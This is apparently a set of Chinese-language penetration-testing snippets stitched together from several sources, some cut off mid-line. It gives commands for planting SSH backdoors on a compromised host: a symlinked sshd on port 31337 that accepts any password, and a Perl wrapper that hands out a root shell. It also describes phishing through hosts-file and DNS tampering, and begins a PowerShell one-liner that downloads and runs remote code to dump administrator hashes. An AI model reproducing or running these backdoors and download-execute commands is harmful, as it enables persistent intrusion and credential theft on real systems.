在网站目录差找如下关键字:grep -Rn "shell_exec *(" /var/wwwgrep -Rn "base64_decode *(" /var/wwwgrep -Rn "phpinfo *(" /var/wwwgrep -Rn ...
渗透过程中的SSH
1.入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口
肉鸡上执行1
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。
2.做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接
在肉鸡上执行:1
2
3
4
5
6
7[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart
通过.PAC进行网络钓鱼
0x00常见网络钓鱼方式
攻击者进行网络钓鱼的方式常有以下几种:
- 1、通过修改受害者hosts文件(
C:\WINDOWS\system32\drivers\etc\hosts
)来实现; - 2、通过修改受害者dns来实现;
- 3、已经进入路由器,直接修改路由器的DNS。
罗列的并不全,之后遇到的话再补充,上述三种方式很常见。
1: 修改HOSTS文件,即攻击者修改受害者HOSTS文件为如下形式:
127.0.0.1 localhost
x.x.x.x www.wooyun.com
Powershell Gethash
使用powershell远程调用来抓取管理hash。在线导hashpowershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent ...